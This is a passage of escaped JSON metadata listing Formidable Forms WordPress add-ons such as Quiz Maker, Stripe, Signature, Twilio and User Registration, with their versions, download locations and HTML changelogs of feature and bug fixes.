showing on the Polylang strings page<\\/li>\\n<li>Fix: Slashes were showing in some strings related to a Polylang update<\\/li>\\n<li>Update codestyling to meet WP standards<\\/li>\\n<\\/ul>\\n<h4>v1.07 - February 8, 2018<\\/h4>\\n<ul>\\n<li>Add rootline titles to translation settings<\\/li>\\n<li>Make repeating fields translatable<\\/li>\\n<li>Fix error message when no languages have been added in Polylang<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-polylang\\/frm-poly.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28124372\":{\"title\":\"Product Reviews\",\"name\":\"Product Reviews\",\"display_name\":\"Product Reviews\",\"slug\":\"product-reviews\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":28124372,\"released\":\"2022-05-05 16:39:04\",\"categories\":[\"Solution\",\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/product-reviews\\/\",\"changelog\":\"\",\"plugin\":\"product-reviews\\/product-reviews.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"20815759\":{\"title\":\"Quiz Maker\",\"name\":\"Quiz Maker\",\"display_name\":\"Quiz Maker\",\"slug\":\"quiz-maker\",\"version\":\"3.1.1\",\"new_version\":\"3.1.1\",\"location\":[\"fp.strategy11.com\\/releases\\/quiz\\/formidable-quizzes-3.1.1.zip\"],\"excerpt\":\"Turn your forms into automated quizzes. Add questions and submit the quiz key. Then all the grading is done for you.\",\"id\":20815759,\"released\":\"2018-09-13 00:00:00\",\"categories\":[\"Business\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/quiz-maker-forms\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/quiz-maker\\/\",\"changelog\":\"<h4>v3.1.1 - August 7, 2023<\\/h4>\\n<ul>\\n<li>New: Text used in this plugin can now be translated.<\\/li>\\n<li>New: Field shortcodes in labels will now be replaced with the expected field value when displaying scored quiz results.<\\/li>\\n<li>Fix: Duplicate score meta would get inserted when editing a scored quiz, resulting in inaccurate stat values.<\\/li>\\n<li>Fix: No dropdown would appear after clicking the button to choose answers for a scored quiz when using Safari.<\\/li>\\n<li>Fix: Field shortcodes would not always get replaced when displaying quiz outcomes.<\\/li>\\n<li>Fix: Advanced scoring options would break when answers included quotation marks.<\\/li>\\n<\\/ul>\\n<h4>v3.1 - October 17, 2022<\\/h4>\\n<ul>\\n<li>New: An exported quiz outcome will now include the URL for an uploaded image and will import the image back into another website when the image URL can be downloaded.<\\/li>\\n<li>New: The rich text editor for quiz outcomes now supports the shortcode pop up.<\\/li>\\n<li>Fix: Score totals were not properly being calculated when using manual scoring for text fields.<\\/li>\\n<li>Fix: Likert questions were not getting scored.<\\/li>\\n<\\/ul>\\n<h4>v3.0 - September 7, 2022<\\/h4>\\n<ul>\\n<li>New: Added new Quiz Outcomes! You can now add an action for each outcome and add rules similar to conditional logic to score each outcome. The highest scoring will be used as the result.<\\/li>\\n<li>Fix: Styles were not loading for a scored quiz result when submitting with AJAX.<\\/li>\\n<li>Fix: Only the scores for the first and last rows of a CSV were properly getting set after importing entries.<\\/li>\\n<li>Fix: Scroll was not working properly when setting quiz scores, making it difficult to see everything in the pop up.<\\/li>\\n<\\/ul>\\n<h4>v2.0.02 - April 7, 2022<\\/h4>\\n<ul>\\n<li>Fix: Conditional logic based off of quiz scores in form actions was not working.<\\/li>\\n<\\/ul>\\n<h4>v2.0.01 - March 25, 2022<\\/h4>\\n<ul>\\n<li>Fix: Fixed the appearance of correct answers in emails.<\\/li>\\n<li>Fix: Quiz scores were not appearing in emails.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-quizzes\\/formidable-quizzes.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"quiz, quizzes\",\"is_new\":false},\"28124331\":{\"title\":\"Real Estate Listings\",\"name\":\"Real Estate Listings\",\"display_name\":\"Real Estate Listings\",\"slug\":\"real-estate-listings\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":28124331,\"released\":\"2022-05-05 13:53:10\",\"categories\":[\"Solution\",\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/real-estate-listings\\/\",\"changelog\":\"\",\"plugin\":\"real-estate-listings\\/real-estate-listings.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28123664\":{\"title\":\"Restaurant Menu\",\"name\":\"Restaurant Menu\",\"display_name\":\"Restaurant Menu\",\"slug\":\"restaurant-menu\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":28123664,\"released\":\"2022-05-02 13:25:31\",\"categories\":[\"Solution\",\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/restaurant-menu\\/\",\"changelog\":\"\",\"plugin\":\"restaurant-menu\\/restaurant-menu.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"20266559\":{\"title\":\"Salesforce\",\"name\":\"Salesforce\",\"display_name\":\"Salesforce\",\"slug\":\"salesforce\",\"version\":\"2.04\",\"new_version\":\"2.04\",\"location\":[\"fp.strategy11.com\\/releases\\/salesforce\\/formidable-salesforce-2.04.zip\"],\"excerpt\":\"Add new contacts and leads into your Salesforce CRM directly from the WordPress forms on your site.\",\"id\":20266559,\"released\":\"2018-05-31 00:00:00\",\"categories\":[\"CRM\",\"Elite\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/salesforce-forms\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/salesforce\\/\",\"changelog\":\"<h4>v2.04 - December 10, 2019<\\/h4>\\n<ul>\\n<li>New: Show Salesforce Authentication errors on the global settings page<\\/li>\\n<li>Add icon in global settings<\\/li>\\n<li>Use font icon instead of image in form action<\\/li>\\n<li>Remove debug mode in favor of logging<\\/li>\\n<li>Tweak: Clear the settings cache with a link instead of ajax for more reliable cache clearing<\\/li>\\n<li>Fix: Updating data in Salesforce wasn\'t working correctly<\\/li>\\n<li>Fix: There was an error when Formidable was disabled<\\/li>\\n<\\/ul>\\n<h4>v2.03 - October 11, 2018<\\/h4>\\n<ul>\\n<li>New: Add option to update Salesforce records<\\/li>\\n<li>New: Add support for Salesforce Boolean fields<\\/li>\\n<li>Fix: Multiselect picklist fields weren\'t getting correct values from a checkbox<\\/li>\\n<li>Fix: Date fields set as a post field were sending the wrong date format<\\/li>\\n<li>Fix: Fatal error caused by date fields in certain formats<\\/li>\\n<\\/ul>\\n<h4>v2.02 - June 14, 2018<\\/h4>\\n<ul>\\n<li>Add API calls to <a href=\\\"https:\\/\\/formidableforms.com\\/features\\/api-logs\\/\\\">Logs plugin<\\/a><\\/li>\\n<li>Add more messages for debugging<\\/li>\\n<li>Fix issue with authenticating on an SSL site<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-salesforce\\/formidable-salesforce.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"163248\":{\"title\":\"Signature\",\"name\":\"Signature\",\"display_name\":\"Digital Signatures\",\"slug\":\"signature\",\"version\":\"3.0.3\",\"new_version\":\"3.0.3\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-signature\\/formidable-signature-3.0.3.zip\"],\"excerpt\":\"Add an electronic signature to your WordPress form. The visitor may write their signature with a trackpad\\/mouse or type it.\",\"id\":163248,\"released\":\"2013-03-04 00:00:00\",\"categories\":[\"Business\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/formidable-signature\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/signature\\/\",\"changelog\":\"<h4>v3.0.3 - June 15, 2023<\\/h4>\\n<ul>\\n<li>New: Added support for a new show=url shortcode option for signature fields.<\\/li>\\n<li>Fix: Icons were not aligning properly for some button size style settings.<\\/li>\\n<li>Fix: Signature fields would overflow when some field size style settings were applied.<\\/li>\\n<\\/ul>\\n<h4>v3.0.2 - January 11, 2023<\\/h4>\\n<ul>\\n<li>Security: Added validation to signature URLs to guarantee the signature data is coming from a trusted source with the proper expected format.<\\/li>\\n<\\/ul>\\n<h4>v3.0.1 - December 7, 2022<\\/h4>\\n<ul>\\n<li>Fix: Styling a signature field was inconsistent based on the type of color value set.<\\/li>\\n<li>Fix: Signature fields would break in some cases where the scripts have been merged and modified, resulting in a \\\"Uncaught TypeError: b is not a function\\\" message.<\\/li>\\n<li>Fix: Signature toggle buttons would disappear on focus when using the Twenty Twenty One theme.<\\/li>\\n<li>Fix: Empty signature field values were not saving as expected so filtering for entries without a signature wouldn\'t return the expected results.<\\/li>\\n<li>Fix: In some cases signature files were unable to get saved because the WordPress file system being used by default would require additional credentials to work.<\\/li>\\n<\\/ul>\\n<h4>v3.0 - August 1, 2022<\\/h4>\\n<ul>\\n<li>New: Updated signature scripts to use a newer, better supported signature library.<\\/li>\\n<li>New: The start over button will now reset signatures when clicked.<\\/li>\\n<li>Fix: Prevent a PHP 8.1 deprecated message that gets triggered when converting signatures to images.<\\/li>\\n<\\/ul>\\n<h4>v2.07 - May 2, 2022<\\/h4>\\n<ul>\\n<li>New: A new \\\"Allow editing\\\" checkbox setting has been added to signature fields. When toggled signatures can be cleared and updated when editing in place and when editing draft entries.<\\/li>\\n<li>Fix: Typed signature text was getting cut off when the default form style was set to override theme styling.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-signature\\/signature.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"310430\":{\"title\":\"Stripe\",\"name\":\"Stripe\",\"display_name\":\"Stripe\",\"slug\":\"stripe\",\"version\":\"3.1.1\",\"new_version\":\"3.1.1\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-stripe\\/formidable-stripe-3.1.1.zip\"],\"excerpt\":\"Any Formidable forms on your site can accept credit card payments without users ever leaving your site.\",\"id\":310430,\"released\":\"2016-04-26 00:00:00\",\"categories\":[\"Business\",\"Ecommerce\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/stripe\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/stripe\\/\",\"changelog\":\"<h4>v3.1.1 - August 2, 2023<\\/h4>\\n<ul>\\n<li>Security: Added a nonce check and additional validation when deleting payments.<\\/li>\\n<li>New: A clickable (no title) link will now be displayed instead of a blank space in the form column of the payments table for forms without titles.<\\/li>\\n<li>New: Subscription IDs are now clickable links to the Stripe Dashboard when viewing a subscription.<\\/li>\\n<li>New: Links to deleted entries have been removed from the payments table. Deleted entries are now flagged with (Deleted) following the entry ID.<\\/li>\\n<li>New: Compatibility with the PayPal add on has been improved. Now PayPal payments will use the proper PayPal case when displayed on admin pages and the payment status will no longer be be blank for a pending PayPal payment.<\\/li>\\n<li>New: A confirmation pop up has been added when deleting a payment.<\\/li>\\n<li>Fix: Stripe Link payments would redirect to an invalid URL when embedded.<\\/li>\\n<li>Fix: Stripe Link payments would redirect to a blank 0 page when Formidable Multilingual was active because of an invalid URL.<\\/li>\\n<li>Fix: Stripe payment intents were getting created without additional payment method types for recurring payments when using a connected Stripe account.<\\/li>\\n<li>Fix: An additional incomplete payment would always get created after submitting a form with a Stripe Link action.<\\/li>\\n<li>Fix: Stripe actions with dynamic amount values were not updating on load when the amount is defined by a target field\'s default value, causing payments to appear as $1 instead of the expected value.<\\/li>\\n<li>Fix: A redirect would go to a blank page after successfully cancelling a subscription from the View Entry page.<\\/li>\\n<li>Fix: Conditional logic wasn\'t working for redirect confirmation actions. The same redirect URL would always be used regardless of field values.<\\/li>\\n<li>Fix: Japanese Yen payments were getting logged to the database as the incorrect value because of a decimal calculation issue.<\\/li>\\n<\\/ul>\\n<h4>v3.1 - July 11, 2023<\\/h4>\\n<ul>\\n<li>New: Stripe actions with Link enabled will now use automatic payments by default with support for many new payment method types including iDEAL, Bancontact, SOFORT, ACH, Affirm, Klarna, EPS, giropay, Przelewy24, Alipay, WeChat, Cash App, and SEPA debit.<\\/li>\\n<li>Fix: The number of payments per page pagination setting would not apply updates, only allowing the default value.<\\/li>\\n<li>Fix: Payment descriptions, names, and addresses are now properly applied to one time Stripe link payments.<\\/li>\\n<li>Fix: Repeated fields would disappear after reloading a form as the result of a failed payment.<\\/li>\\n<li>Fix: Redirects to external URLs were not directing to the proper URL when Stripe Link was enabled.<\\/li>\\n<li>Fix: Receipt urls were inaccurate when linking to a setup intents for Stripe link subscriptions.<\\/li>\\n<li>Fix: Credit card field descriptions would move to the wrong place with this add-on active on forms without Stripe actions.<\\/li>\\n<li>Fix: Stripe link email field labels were not properly styled to match other labels in the form.<\\/li>\\n<li>Fix: Deprecation message were getting logged when PHP 8.2 is active due to dynamic properties.<\\/li>\\n<li>The included Stripe SDK has been updated to version v10.14.0.<\\/li>\\n<li>The credit card field has been renamed to Payment to reflect the additional available payment methods supported as not all methods use a credit card.<\\/li>\\n<\\/ul>\\n<h4>v3.0 - December 6, 2022<\\/h4>\\n<ul>\\n<li>New: A new \\\"Use previously saved card with Stripe link.\\\" toggle has been added to Stripe actions. Now customers can save their credit card with Stripe and use it again later using a 6 digit verification code sent to their phone.<\\/li>\\n<\\/ul>\\n<h4>v2.07 - October 4, 2022<\\/h4>\\n<ul>\\n<li>New: Added more caching and error handling for Stripe events to help improve performance.<\\/li>\\n<li>Fix: Actions that trigger on failed payments would also trigger for a pending 3D secure payment.<\\/li>\\n<li>Fix: Stripe forms were not properly submitting when on a translated WPML page when using the different languages in directories setting.<\\/li>\\n<li>Fix: Forms were not always properly restarting after a failed payment.<\\/li>\\n<li>Fix: A one time 3D secure payment would stay as pending and never update to complete or failed when processing the payment after creating the entry.<\\/li>\\n<li>Fix: A recurring 3D secure payment would get set to failed before finishing 3D secure verification, triggering actions immediately that happen on failed payment.<\\/li>\\n<\\/ul>\\n<h4>v2.06 - May 11, 2022<\\/h4>\\n<ul>\\n<li>New: When a credit card fails on a form with multiple pages, the form will restart on the page with the credit card field present.<\\/li>\\n<li>New: Added additional currencies from Pro.<\\/li>\\n<li>Fix: Invisible reCAPTCHA fields were causing forms with Stripe payments to fail validation.<\\/li>\\n<li>Fix: Updated incorrect text domains.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-stripe\\/formidable-stripe.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28067256\":{\"title\":\"Surveys and Polls\",\"name\":\"Surveys and Polls\",\"display_name\":\"Surveys and Polls\",\"slug\":\"surveys\",\"version\":\"1.0.09\",\"new_version\":\"1.0.09\",\"location\":[\"fp.strategy11.com\\/releases\\/surveys\\/formidable-surveys-1.0.09.zip\"],\"excerpt\":\"Transform your WordPress site into a data collection machine with our user-friendly survey form builder.\",\"id\":28067256,\"released\":\"2021-09-16 00:00:00\",\"categories\":[\"Business\",\"Strategy11\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase\\/surveys-and-polls-forms\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/surveys\\/\",\"changelog\":\"<h4>v1.0.09 - June 23, 2023<\\/h4>\\n<ul>\\n<li>Fix: Additional checkbox options were missing.<\\/li>\\n<\\/ul>\\n<h4>v1.0.08 - June 21, 2023<\\/h4>\\n<ul>\\n<li>New: Scale fields now support a Buttons display format option.<\\/li>\\n<li>Fix: In some cases radio buttons and checkboxes were overlapping field descriptions.<\\/li>\\n<\\/ul>\\n<h4>v1.0.07 - April 13, 2023<\\/h4>\\n<ul>\\n<li>Fix: Radio buttons with really long labels using the Buttons display format were not responsive on smaller screen resolutions.<\\/li>\\n<li>Fix: Likert fields would export as a CSV out of order as the first columns regardless of field order.<\\/li>\\n<li>Fix: Radio buttons displayed with the buttons display format would appear using the background color of the default style in the form builder.<\\/li>\\n<li>Fix: NPS fields with no value would appear as 0 instead of blank.<\\/li>\\n<\\/ul>\\n<h4>v1.0.06 - July 5, 2022<\\/h4>\\n<ul>\\n<li>New: Added a new frm_surveys_likert_responsive_breakpoint filter for customizing the responsiveness point for Likert fields.<\\/li>\\n<li>Fix: Improved how Likert fields are exported and imported as CSV. A column will no longer be exported for the Likert field parent, and the name of the Likert field will be prepended in the headers of the child question fields.<\\/li>\\n<li>Fix: Likert field values in repeaters were not properly getting set when importing data with a CSV file.<\\/li>\\n<li>Fix: Likert row and column options were not draggable when loaded via AJAX in a long form.<\\/li>\\n<li>Fix: Deleting every column in a Likert would cause the field to break and warnings to get triggered on preview.<\\/li>\\n<li>Fix: Likert styling was not working properly when the Likert was conditionally hidden.<\\/li>\\n<li>Fix: NPS fields from previous pages were not working in calculations in multiple page forms.<\\/li>\\n<\\/ul>\\n<h4>v1.0.05 - March 4, 2022<\\/h4>\\n<ul>\\n<li>Fix: Custom validation messages were not being used for required Likert fields.<\\/li>\\n<li>Fix: Error messages were not appearing properly for required Likert fields inside of repeaters.<\\/li>\\n<li>Fix: JavaScript validation was not working for required Likert fields inside of repeaters.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-surveys\\/formidable-surveys.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28123668\":{\"title\":\"Team Directory\",\"name\":\"Team Directory\",\"display_name\":\"Team Directory\",\"slug\":\"team-directory\",\"version\":\"\",\"new_version\":\"\",\"location\":[],\"excerpt\":\"\",\"id\":28123668,\"released\":\"2022-05-02 13:24:48\",\"categories\":[\"Solution\",\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/team-directory\\/\",\"changelog\":\"\",\"plugin\":\"team-directory\\/team-directory.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"168460\":{\"title\":\"Twilio\",\"name\":\"Twilio\",\"display_name\":\"Twilio WordPress SMS\",\"slug\":\"twilio\",\"version\":\"1.09\",\"new_version\":\"1.09\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-twilio\\/formidable-twilio-1.09.zip\"],\"excerpt\":\"Allow users to text their votes for polls created by Formidable Forms, or send SMS notifications when entries are submitted or updated.\",\"id\":168460,\"released\":\"2014-03-10 00:00:00\",\"categories\":[\"Business\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/twilio-add-on\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/twilio\\/\",\"changelog\":\"<h4>v1.09 - November 2, 2020<\\/h4>\\n<ul>\\n<li>New: Include sending numbers from the linked Twilio account in a dropdown. This makes it much easier to send messages successfully.<\\/li>\\n<li>New: Process the [default-message] when sending in an SMS message.<\\/li>\\n<li>Add more guidance to connect to the Twilio API and show messages in the form action when connecting fails.<\\/li>\\n<li>Fix: Some responses were not getting saved correctly into radio and checkbox fields.<\\/li>\\n<li>Clean up and update the code including removing support for Formidable &lt;2.0.<\\/li>\\n<\\/ul>\\n<h4>v1.08 - January 16, 2017<\\/h4>\\n<ul>\\n<li>Improved: Removed deprecated instructions and screenshot.<\\/li>\\n<li>Improved: Removed deprecated valign attribute from table HTML.<\\/li>\\n<\\/ul>\\n<h4>v1.07 - November 1, 2016<\\/h4>\\n<ul>\\n<li>When an SMS message is received, run validation and respond with a text that includes any error messages<\\/li>\\n<li>When a text is received successfully, respond with the form success message, filtered list like a form does.<\\/li>\\n<li>Allow for the \\\"other\\\" fields to be filled from a text submission<\\/li>\\n<li>Check if license number is for correct plugin<\\/li>\\n<li>Don\'t try to send messages to a blank number<\\/li>\\n<\\/ul>\\n<h4>v1.06 - November 13, 2015<\\/h4>\\n<ul>\\n<li>Add frmtwlo_format_number filter for formatting the phone number before it\'s sent to Twilio<\\/li>\\n<li>Fix license activation<\\/li>\\n<\\/ul>\\n<h4>v1.05 - October 16, 2015<\\/h4>\\n<ul>\\n<li>Add frmtwlo_sms_response hook for changing the message in the text<\\/li>\\n<li>Allow for 8-digit numbers. +65 phone numbers were having trouble because we assumed they should be US numbers. Now if the number starts with a +, don\'t add the +1<\\/li>\\n<li>Get updates from FormidableForms.com<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-twilio\\/formidable-twilio.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"168456\":{\"title\":\"Upload Importer\",\"name\":\"Upload Importer\",\"display_name\":\"Upload Importer\",\"slug\":\"upload-importer\",\"version\":\"1.0.01\",\"new_version\":\"1.0.01\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-upload-importer\\/formidable-upload-importer-1.0.01.zip\"],\"excerpt\":\"\",\"id\":168456,\"released\":\"2015-10-16 17:05:47\",\"categories\":[\"Strategy11\"],\"docs\":\"\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/upload-importer\\/\",\"changelog\":\"<h4>v1.0.01<\\/h4>\\n<ul>\\n<li>Get updates from FormidablePro.com<\\/li>\\n<\\/ul>\\n<h4>v1.0<\\/h4>\\n<ul>\\n<li>Allow importing of multiple file uploads<\\/li>\\n<li>Replace deprecated mime_content_type with fileinfo<\\/li>\\n<li>Update auto-updating<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"upload-importer\\/upload-importer.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"173984\":{\"title\":\"User Registration\",\"name\":\"User Registration\",\"display_name\":\"User Registration\",\"slug\":\"user-registration\",\"version\":\"2.10\",\"new_version\":\"2.10\",\"location\":[\"s3.amazonaws.com\\/fp.strategy11.com\\/releases\\/formidable-registration\\/formidable-registration-2.10.zip\"],\"excerpt\":\"Give new users access to your site quickly and painlessly. Plus edit profiles and login from the front end.\",\"id\":173984,\"released\":\"2011-12-21 00:00:00\",\"categories\":[\"Business\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/user-registration\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/user-registration\\/\",\"changelog\":\"<h4>v2.10 - August 7, 2023<\\/h4>\\n<ul>\\n<li>New: Redirects after user moderation will now use the applicable translated Polylang page based on the current language.<\\/li>\\n<li>Fix: When updating a user with a registration action, the new role would never get set.<\\/li>\\n<li>Fix: Login form scripts would occasionally load without jQuery resulting in a \\\"jQuery is not defined\\\" error, preventing the slide=1 option from working.<\\/li>\\n<li>Fix: The layout=h option was not working for frm-login shortcodes.<\\/li>\\n<li>Fix: The multiselect dropdown for action event types would not properly initialize when clicking the create new email buttons.<\\/li>\\n<li>Fix: Pages were getting flagged incorrectly when a registration form was embedded using an Elementor block.<\\/li>\\n<li>Fix: A fatal error would happen on login pages when an unexpected array format was used for the redirect_to URL param.<\\/li>\\n<li>The FrmRegLoginForm::<span class=\\\"blob-code-inner blob-code-marker js-code-nav-pass \\\" data-code-marker=\\\"+\\\"><span class=\\\"pl-en\\\"><span class=\\\"pl-token active\\\" data-hydro-click=\\\"{\\\" data-hydro-click-hmac=\\\"5243778f45be7cfe614e45919829c8cd621f226d9e2bce3459cf978e3a7b985a\\\">load_login_form_css<\\/span><\\/span><\\/span> function has been deprecated and no longer does anything when called.<\\/li>\\n<li>Some old CSS has been removed, reducing the size of the required front end CSS file.<\\/li>\\n<\\/ul>\\n<h4>v2.09 - October 4, 2022<\\/h4>\\n<ul>\\n<li>New: Page dropdowns for registration pages now use an autocomplete input for sites with more than 50 pages, reducing the amount of memory required for websites with many pages.<\\/li>\\n<li>Fix: Fix a conflict with the All in One WP Security plugin. Previously a Formidable login page would not properly load the reCAPTCHA scripts that are initialized by All in One WP Security.<\\/li>\\n<li>Fix: Login, registration, and password reset pages will now use the localized links set by Polylang based on the user\'s active language defined by Polylang.<\\/li>\\n<li>Fix: Users who can normally edit other user\'s entries were not able to update user meta values unless they also had permission to create users.<\\/li>\\n<\\/ul>\\n<h4>v2.08 - June 13, 2022<\\/h4>\\n<ul>\\n<li>New: Added a new frmreg_show_meta_on_profile filter for toggling off the user meta that is displayed on user profiles.<\\/li>\\n<li>Fix: User meta was not appearing in user profiles in newer versions of WordPress.<\\/li>\\n<li>Fix: Links to resend emails were being stripped from HTML.<\\/li>\\n<li>Fix: The class_reminder [frm-login] shortcode option was not being applied unless show_lost_password was set.<\\/li>\\n<li>Fix: When a user was activated, the new role was overwriting any other roles that were applied to the user that were added before activation.<\\/li>\\n<li>Fix: Some users registered on update with a chosen password were having problems logging in because of a role issue.<\\/li>\\n<\\/ul>\\n<h4>v2.07 - May 10, 2022<\\/h4>\\n<ul>\\n<li>Fix: A conflict with Limited Login Attempts Reloaded was causing performance issues in some cases resulting in high CPU usage.<\\/li>\\n<\\/ul>\\n<h4>v2.06 - May 4, 2022<\\/h4>\\n<ul>\\n<li>Fix: Resolved a conflict with Woocommerce that was causing a fatal error on automatic login with last release when Woocoomerce tracking was enabled.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-registration\\/formidable-registration.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"registration, user registration, register\",\"is_new\":false},\"170649\":{\"title\":\"User Tracking\",\"name\":\"User Tracking\",\"display_name\":\"User Flow\",\"slug\":\"user-tracking\",\"version\":\"2.0\",\"new_version\":\"2.0\",\"location\":[\"s3.amazonaws.com\\/fp.strategy11.com\\/releases\\/formidable-user-tracking\\/formidable-user-tracking-2.0.zip\"],\"excerpt\":\"Track the pages a user visits and the time spent on each page prior to submitting a form.\",\"id\":170649,\"released\":\"2015-10-19 00:00:00\",\"categories\":[\"Creator\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/formidable-user-tracking\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/user-tracking\\/\",\"changelog\":\"<h4>v2.0 - November 1, 2022<\\/h4>\\n<ul>\\n<li>Update the display of the user flow through the site for better readability and more actionable data.<\\/li>\\n<li>Include timestamps in the session tracking so we know how much time was spent on each page.<\\/li>\\n<li>Show the page name for better readability.<\\/li>\\n<li>Add form submissions into session tracking so we know what forms were submitted before this one.<\\/li>\\n<li>Show a summary of how much time between the first time we logged the user and when the form was submitted.<\\/li>\\n<li>Fix: Do not start session when running a Cron.<\\/li>\\n<\\/ul>\\n<h4>v1.0 - August 25, 2016<\\/h4>\\n<ul>\\n<li>Save the tracking info before the email is sent<\\/li>\\n<li>Make sure license key is correct before 